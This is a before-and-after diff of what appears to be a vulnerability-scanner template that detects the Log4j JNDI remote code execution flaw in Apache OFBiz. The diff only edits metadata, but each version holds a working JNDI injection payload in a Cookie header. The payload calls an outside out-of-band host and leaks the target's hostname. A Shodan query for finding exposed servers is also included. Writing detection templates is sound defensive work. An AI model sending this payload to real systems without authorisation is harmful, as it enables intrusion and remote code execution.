vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml (before)
id: apache-ofbiz-log4j-rce

info:
  name: Apache OFBiz - Log4j JNDI Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.
  reference:
    - https://issues.apache.org/jira/browse/OFBIZ-12449
    - https://ofbiz.apache.org/
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  remediation: Upgrade to Apache OFBiz version 8.12.03 or later.
  metadata:
    shodan-query: http.html:"Apache OFBiz"
  tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi

requests:
  - raw:
      - |
        GET /webtools/control/main HTTP/1.1
        Host: {{Hostname}}
        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/05/27

vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml (after)
id: apache-ofbiz-log4j-rce

info:
  name: Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
  author: pdteam
  severity: critical
  description: |
    Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.
  remediation: Upgrade to Apache OFBiz version 8.12.03 or later.
  reference:
    - https://issues.apache.org/jira/browse/OFBIZ-12449
    - https://ofbiz.apache.org/
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    shodan-query: http.html:"Apache OFBiz"
  tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev

requests:
  - raw:
      - |
        GET /webtools/control/main HTTP/1.1
        Host: {{Hostname}}
        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/05/27

vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml (diff)
@@ -1,24 +1,25 @@
 id: apache-ofbiz-log4j-rce
 
 info:
-  name: Apache OFBiz - Log4j JNDI Remote Code Execution
+  name: Apache OFBiz - JNDI Remote Code Execution (Apache Log4j)
   author: pdteam
   severity: critical
   description: |
     Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.
+  remediation: Upgrade to Apache OFBiz version 8.12.03 or later.
   reference:
     - https://issues.apache.org/jira/browse/OFBIZ-12449
     - https://ofbiz.apache.org/
     - https://logging.apache.org/log4j/2.x/security.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
+    cve-id: CVE-2021-44228
     cwe-id: CWE-77
-  remediation: Upgrade to Apache OFBiz version 8.12.03 or later.
   metadata:
     shodan-query: http.html:"Apache OFBiz"
-  tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi
+  tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
 
 requests:
   - raw:
